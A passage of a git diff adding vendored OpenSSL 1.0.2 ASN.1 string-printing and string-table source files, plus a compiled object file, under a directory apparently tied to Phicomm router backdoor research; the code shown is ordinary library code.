+        BIO_snprintf(tmphex, sizeof tmphex, "\\U%04lX", c);
+        if (!io_ch(arg, tmphex, 6))
+            return -1;
+        return 6;
+    }
+    chtmp = (unsigned char)c;
+    if (chtmp > 0x7f)
+        chflgs = flags & ASN1_STRFLGS_ESC_MSB;
+    else
+        chflgs = char_type[chtmp] & flags;
+    if (chflgs & CHARTYPE_BS_ESC) {
+        /* If we don't escape with quotes, signal we need quotes */
+        if (chflgs & ASN1_STRFLGS_ESC_QUOTE) {
+            if (do_quotes)
+                *do_quotes = 1;
+            if (!io_ch(arg, &chtmp, 1))
+                return -1;
+            return 1;
+        }
+        if (!io_ch(arg, "\\", 1))
+            return -1;
+        if (!io_ch(arg, &chtmp, 1))
+            return -1;
+        return 2;
+    }
+    if (chflgs & (ASN1_STRFLGS_ESC_CTRL | ASN1_STRFLGS_ESC_MSB)) {
+        BIO_snprintf(tmphex, 11, "\\%02X", chtmp);
+        if (!io_ch(arg, tmphex, 3))
+            return -1;
+        return 3;
+    }
+    /*
+     * If we get this far and do any escaping at all must escape the escape
+     * character itself: backslash.
+     */
+    if (chtmp == '\\' && flags & ESC_FLAGS) {
+        if (!io_ch(arg, "\\\\", 2))
+            return -1;
+        return 2;
+    }
+    if (!io_ch(arg, &chtmp, 1))
+        return -1;
+    return 1;
+}
+
+#define BUF_TYPE_WIDTH_MASK     0x7
+#define BUF_TYPE_CONVUTF8       0x8
+
+/*
+ * This function sends each character in a buffer to do_esc_char(). It
+ * interprets the content formats and converts to or from UTF8 as
+ * appropriate.
+ */
+
+static int do_buf(unsigned char *buf, int buflen,
+                  int type, unsigned char flags, char *quotes, char_io *io_ch,
+                  void *arg)
+{
+    int i, outlen, len;
+    unsigned char orflags, *p, *q;
+    unsigned long c;
+    p = buf;
+    q = buf + buflen;
+    outlen = 0;
+    while (p != q) {
+        if (p == buf && flags & ASN1_STRFLGS_ESC_2253)
+            orflags = CHARTYPE_FIRST_ESC_2253;
+        else
+            orflags = 0;
+        switch (type & BUF_TYPE_WIDTH_MASK) {
+        case 4:
+            c = ((unsigned long)*p++) << 24;
+            c |= ((unsigned long)*p++) << 16;
+            c |= ((unsigned long)*p++) << 8;
+            c |= *p++;
+            break;
+
+        case 2:
+            c = ((unsigned long)*p++) << 8;
+            c |= *p++;
+            break;
+
+        case 1:
+            c = *p++;
+            break;
+
+        case 0:
+            i = UTF8_getc(p, buflen, &c);
+            if (i < 0)
+                return -1;      /* Invalid UTF8String */
+            p += i;
+            break;
+        default:
+            return -1;          /* invalid width */
+        }
+        if (p == q && flags & ASN1_STRFLGS_ESC_2253)
+            orflags = CHARTYPE_LAST_ESC_2253;
+        if (type & BUF_TYPE_CONVUTF8) {
+            unsigned char utfbuf[6];
+            int utflen;
+            utflen = UTF8_putc(utfbuf, sizeof utfbuf, c);
+            for (i = 0; i < utflen; i++) {
+                /*
+                 * We don't need to worry about setting orflags correctly
+                 * because if utflen==1 its value will be correct anyway
+                 * otherwise each character will be > 0x7f and so the
+                 * character will never be escaped on first and last.
+                 */
+                len =
+                    do_esc_char(utfbuf[i], (unsigned char)(flags | orflags),
+                                quotes, io_ch, arg);
+                if (len < 0)
+                    return -1;
+                outlen += len;
+            }
+        } else {
+            len =
+                do_esc_char(c, (unsigned char)(flags | orflags), quotes,
+                            io_ch, arg);
+            if (len < 0)
+                return -1;
+            outlen += len;
+        }
+    }
+    return outlen;
+}
+
+/* This function hex dumps a buffer of characters */
+
+static int do_hex_dump(char_io *io_ch, void *arg, unsigned char *buf,
+                       int buflen)
+{
+    static const char hexdig[] = "0123456789ABCDEF";
+    unsigned char *p, *q;
+    char hextmp[2];
+    if (arg) {
+        p = buf;
+        q = buf + buflen;
+        while (p != q) {
+            hextmp[0] = hexdig[*p >> 4];
+            hextmp[1] = hexdig[*p & 0xf];
+            if (!io_ch(arg, hextmp, 2))
+                return -1;
+            p++;
+        }
+    }
+    return buflen << 1;
+}
+
+/*
+ * "dump" a string. This is done when the type is unknown, or the flags
+ * request it. We can either dump the content octets or the entire DER
+ * encoding. This uses the RFC2253 #01234 format.
+ */
+
+static int do_dump(unsigned long lflags, char_io *io_ch, void *arg,
+                   ASN1_STRING *str)
+{
+    /*
+     * Placing the ASN1_STRING in a temp ASN1_TYPE allows the DER encoding to
+     * readily obtained
+     */
+    ASN1_TYPE t;
+    unsigned char *der_buf, *p;
+    int outlen, der_len;
+
+    if (!io_ch(arg, "#", 1))
+        return -1;
+    /* If we don't dump DER encoding just dump content octets */
+    if (!(lflags & ASN1_STRFLGS_DUMP_DER)) {
+        outlen = do_hex_dump(io_ch, arg, str->data, str->length);
+        if (outlen < 0)
+            return -1;
+        return outlen + 1;
+    }
+    t.type = str->type;
+    t.value.ptr = (char *)str;
+    der_len = i2d_ASN1_TYPE(&t, NULL);
+    der_buf = OPENSSL_malloc(der_len);
+    if (!der_buf)
+        return -1;
+    p = der_buf;
+    i2d_ASN1_TYPE(&t, &p);
+    outlen = do_hex_dump(io_ch, arg, der_buf, der_len);
+    OPENSSL_free(der_buf);
+    if (outlen < 0)
+        return -1;
+    return outlen + 1;
+}
+
+/*
+ * Lookup table to convert tags to character widths, 0 = UTF8 encoded, -1 is
+ * used for non string types otherwise it is the number of bytes per
+ * character
+ */
+
+static const signed char tag2nbyte[] = {
+    -1, -1, -1, -1, -1,         /* 0-4 */
+    -1, -1, -1, -1, -1,         /* 5-9 */
+    -1, -1, 0, -1,              /* 10-13 */
+    -1, -1, -1, -1,             /* 15-17 */
+    -1, 1, 1,                   /* 18-20 */
+    -1, 1, 1, 1,                /* 21-24 */
+    -1, 1, -1,                  /* 25-27 */
+    4, -1, 2                    /* 28-30 */
+};
+
+/*
+ * This is the main function, print out an ASN1_STRING taking note of various
+ * escape and display options. Returns number of characters written or -1 if
+ * an error occurred.
+ */
+
+static int do_print_ex(char_io *io_ch, void *arg, unsigned long lflags,
+                       ASN1_STRING *str)
+{
+    int outlen, len;
+    int type;
+    char quotes;
+    unsigned char flags;
+    quotes = 0;
+    /* Keep a copy of escape flags */
+    flags = (unsigned char)(lflags & ESC_FLAGS);
+
+    type = str->type;
+
+    outlen = 0;
+
+    if (lflags & ASN1_STRFLGS_SHOW_TYPE) {
+        const char *tagname;
+        tagname = ASN1_tag2str(type);
+        outlen += strlen(tagname);
+        if (!io_ch(arg, tagname, outlen) || !io_ch(arg, ":", 1))
+            return -1;
+        outlen++;
+    }
+
+    /* Decide what to do with type, either dump content or display it */
+
+    /* Dump everything */
+    if (lflags & ASN1_STRFLGS_DUMP_ALL)
+        type = -1;
+    /* Ignore the string type */
+    else if (lflags & ASN1_STRFLGS_IGNORE_TYPE)
+        type = 1;
+    else {
+        /* Else determine width based on type */
+        if ((type > 0) && (type < 31))
+            type = tag2nbyte[type];
+        else
+            type = -1;
+        if ((type == -1) && !(lflags & ASN1_STRFLGS_DUMP_UNKNOWN))
+            type = 1;
+    }
+
+    if (type == -1) {
+        len = do_dump(lflags, io_ch, arg, str);
+        if (len < 0)
+            return -1;
+        outlen += len;
+        return outlen;
+    }
+
+    if (lflags & ASN1_STRFLGS_UTF8_CONVERT) {
+        /*
+         * Note: if string is UTF8 and we want to convert to UTF8 then we
+         * just interpret it as 1 byte per character to avoid converting
+         * twice.
+         */
+        if (!type)
+            type = 1;
+        else
+            type |= BUF_TYPE_CONVUTF8;
+    }
+
+    len = do_buf(str->data, str->length, type, flags, &quotes, io_ch, NULL);
+    if (len < 0)
+        return -1;
+    outlen += len;
+    if (quotes)
+        outlen += 2;
+    if (!arg)
+        return outlen;
+    if (quotes && !io_ch(arg, "\"", 1))
+        return -1;
+    if (do_buf(str->data, str->length, type, flags, NULL, io_ch, arg) < 0)
+        return -1;
+    if (quotes && !io_ch(arg, "\"", 1))
+        return -1;
+    return outlen;
+}
+
+/* Used for line indenting: print 'indent' spaces */
+
+static int do_indent(char_io *io_ch, void *arg, int indent)
+{
+    int i;
+    for (i = 0; i < indent; i++)
+        if (!io_ch(arg, " ", 1))
+            return 0;
+    return 1;
+}
+
+#define FN_WIDTH_LN     25
+#define FN_WIDTH_SN     10
+
+static int do_name_ex(char_io *io_ch, void *arg, X509_NAME *n,
+                      int indent, unsigned long flags)
+{
+    int i, prev = -1, orflags, cnt;
+    int fn_opt, fn_nid;
+    ASN1_OBJECT *fn;
+    ASN1_STRING *val;
+    X509_NAME_ENTRY *ent;
+    char objtmp[80];
+    const char *objbuf;
+    int outlen, len;
+    char *sep_dn, *sep_mv, *sep_eq;
+    int sep_dn_len, sep_mv_len, sep_eq_len;
+    if (indent < 0)
+        indent = 0;
+    outlen = indent;
+    if (!do_indent(io_ch, arg, indent))
+        return -1;
+    switch (flags & XN_FLAG_SEP_MASK) {
+    case XN_FLAG_SEP_MULTILINE:
+        sep_dn = "\n";
+        sep_dn_len = 1;
+        sep_mv = " + ";
+        sep_mv_len = 3;
+        break;
+
+    case XN_FLAG_SEP_COMMA_PLUS:
+        sep_dn = ",";
+        sep_dn_len = 1;
+        sep_mv = "+";
+        sep_mv_len = 1;
+        indent = 0;
+        break;
+
+    case XN_FLAG_SEP_CPLUS_SPC:
+        sep_dn = ", ";
+        sep_dn_len = 2;
+        sep_mv = " + ";
+        sep_mv_len = 3;
+        indent = 0;
+        break;
+
+    case XN_FLAG_SEP_SPLUS_SPC:
+        sep_dn = "; ";
+        sep_dn_len = 2;
+        sep_mv = " + ";
+        sep_mv_len = 3;
+        indent = 0;
+        break;
+
+    default:
+        return -1;
+    }
+
+    if (flags & XN_FLAG_SPC_EQ) {
+        sep_eq = " = ";
+        sep_eq_len = 3;
+    } else {
+        sep_eq = "=";
+        sep_eq_len = 1;
+    }
+
+    fn_opt = flags & XN_FLAG_FN_MASK;
+
+    cnt = X509_NAME_entry_count(n);
+    for (i = 0; i < cnt; i++) {
+        if (flags & XN_FLAG_DN_REV)
+            ent = X509_NAME_get_entry(n, cnt - i - 1);
+        else
+            ent = X509_NAME_get_entry(n, i);
+        if (prev != -1) {
+            if (prev == ent->set) {
+                if (!io_ch(arg, sep_mv, sep_mv_len))
+                    return -1;
+                outlen += sep_mv_len;
+            } else {
+                if (!io_ch(arg, sep_dn, sep_dn_len))
+                    return -1;
+                outlen += sep_dn_len;
+                if (!do_indent(io_ch, arg, indent))
+                    return -1;
+                outlen += indent;
+            }
+        }
+        prev = ent->set;
+        fn = X509_NAME_ENTRY_get_object(ent);
+        val = X509_NAME_ENTRY_get_data(ent);
+        fn_nid = OBJ_obj2nid(fn);
+        if (fn_opt != XN_FLAG_FN_NONE) {
+            int objlen, fld_len;
+            if ((fn_opt == XN_FLAG_FN_OID) || (fn_nid == NID_undef)) {
+                OBJ_obj2txt(objtmp, sizeof objtmp, fn, 1);
+                fld_len = 0;    /* XXX: what should this be? */
+                objbuf = objtmp;
+            } else {
+                if (fn_opt == XN_FLAG_FN_SN) {
+                    fld_len = FN_WIDTH_SN;
+                    objbuf = OBJ_nid2sn(fn_nid);
+                } else if (fn_opt == XN_FLAG_FN_LN) {
+                    fld_len = FN_WIDTH_LN;
+                    objbuf = OBJ_nid2ln(fn_nid);
+                } else {
+                    fld_len = 0; /* XXX: what should this be? */
+                    objbuf = "";
+                }
+            }
+            objlen = strlen(objbuf);
+            if (!io_ch(arg, objbuf, objlen))
+                return -1;
+            if ((objlen < fld_len) && (flags & XN_FLAG_FN_ALIGN)) {
+                if (!do_indent(io_ch, arg, fld_len - objlen))
+                    return -1;
+                outlen += fld_len - objlen;
+            }
+            if (!io_ch(arg, sep_eq, sep_eq_len))
+                return -1;
+            outlen += objlen + sep_eq_len;
+        }
+        /*
+         * If the field name is unknown then fix up the DER dump flag. We
+         * might want to limit this further so it will DER dump on anything
+         * other than a few 'standard' fields.
+         */
+        if ((fn_nid == NID_undef) && (flags & XN_FLAG_DUMP_UNKNOWN_FIELDS))
+            orflags = ASN1_STRFLGS_DUMP_ALL;
+        else
+            orflags = 0;
+
+        len = do_print_ex(io_ch, arg, flags | orflags, val);
+        if (len < 0)
+            return -1;
+        outlen += len;
+    }
+    return outlen;
+}
+
+/* Wrappers round the main functions */
+
+int X509_NAME_print_ex(BIO *out, X509_NAME *nm, int indent,
+                       unsigned long flags)
+{
+    if (flags == XN_FLAG_COMPAT)
+        return X509_NAME_print(out, nm, indent);
+    return do_name_ex(send_bio_chars, out, nm, indent, flags);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int X509_NAME_print_ex_fp(FILE *fp, X509_NAME *nm, int indent,
+                          unsigned long flags)
+{
+    if (flags == XN_FLAG_COMPAT) {
+        BIO *btmp;
+        int ret;
+        btmp = BIO_new_fp(fp, BIO_NOCLOSE);
+        if (!btmp)
+            return -1;
+        ret = X509_NAME_print(btmp, nm, indent);
+        BIO_free(btmp);
+        return ret;
+    }
+    return do_name_ex(send_fp_chars, fp, nm, indent, flags);
+}
+#endif
+
+int ASN1_STRING_print_ex(BIO *out, ASN1_STRING *str, unsigned long flags)
+{
+    return do_print_ex(send_bio_chars, out, flags, str);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int ASN1_STRING_print_ex_fp(FILE *fp, ASN1_STRING *str, unsigned long flags)
+{
+    return do_print_ex(send_fp_chars, fp, flags, str);
+}
+#endif
+
+/*
+ * Utility function: convert any string type to UTF8, returns number of bytes
+ * in output string or a negative error code
+ */
+
+int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in)
+{
+    ASN1_STRING stmp, *str = &stmp;
+    int mbflag, type, ret;
+    if (!in)
+        return -1;
+    type = in->type;
+    if ((type < 0) || (type > 30))
+        return -1;
+    mbflag = tag2nbyte[type];
+    if (mbflag == -1)
+        return -1;
+    mbflag |= MBSTRING_FLAG;
+    stmp.data = NULL;
+    stmp.length = 0;
+    stmp.flags = 0;
+    ret =
+        ASN1_mbstring_copy(&str, in->data, in->length, mbflag,
+                           B_ASN1_UTF8STRING);
+    if (ret < 0)
+        return ret;
+    *out = stmp.data;
+    return stmp.length;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.o
new file mode 100644
index 0000000000000000000000000000000000000000..2e8093c2b2eceacfbc95cf7821f0eeac26edb053
GIT binary patch
literal 9368
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.c
new file mode 100644
index 0000000..5224345
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.c
@@ -0,0 +1,313 @@
+/* a_strnid.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+
+static STACK_OF(ASN1_STRING_TABLE) *stable = NULL;
+static void st_free(ASN1_STRING_TABLE *tbl);
+static int sk_table_cmp(const ASN1_STRING_TABLE *const *a,
+                        const ASN1_STRING_TABLE *const *b);
+
+/*
+ * This is the global mask for the mbstring functions: this is use to mask
+ * out certain types (such as BMPString and UTF8String) because certain
+ * software (e.g. Netscape) has problems with them.
+ */
+
+static unsigned long global_mask = B_ASN1_UTF8STRING;
+
+void ASN1_STRING_set_default_mask(unsigned long mask)
+{
+    global_mask = mask;
+}
+
+unsigned long ASN1_STRING_get_default_mask(void)
+{
+    return global_mask;
+}
+
+/*-
+ * This function sets the default to various "flavours" of configuration.
+ * based on an ASCII string. Currently this is:
+ * MASK:XXXX : a numerical mask value.
+ * nobmp : Don't use BMPStrings (just Printable, T61).
+ * pkix : PKIX recommendation in RFC2459.
+ * utf8only : only use UTF8Strings (RFC2459 recommendation for 2004).
+ * default:   the default value, Printable, T61, BMP.
+ */
+
+int ASN1_STRING_set_default_mask_asc(const char *p)
+{
+    unsigned long mask;
+    char *end;
+    if (!strncmp(p, "MASK:", 5)) {
+        if (!p[5])
+            return 0;
+        mask = strtoul(p + 5, &end, 0);
+        if (*end)
+            return 0;
+    } else if (!strcmp(p, "nombstr"))
+        mask = ~((unsigned long)(B_ASN1_BMPSTRING | B_ASN1_UTF8STRING));
+    else if (!strcmp(p, "pkix"))
+        mask = ~((unsigned long)B_ASN1_T61STRING);
+    else if (!strcmp(p, "utf8only"))
+        mask = B_ASN1_UTF8STRING;
+    else if (!strcmp(p, "default"))
+        mask = 0xFFFFFFFFL;
+    else
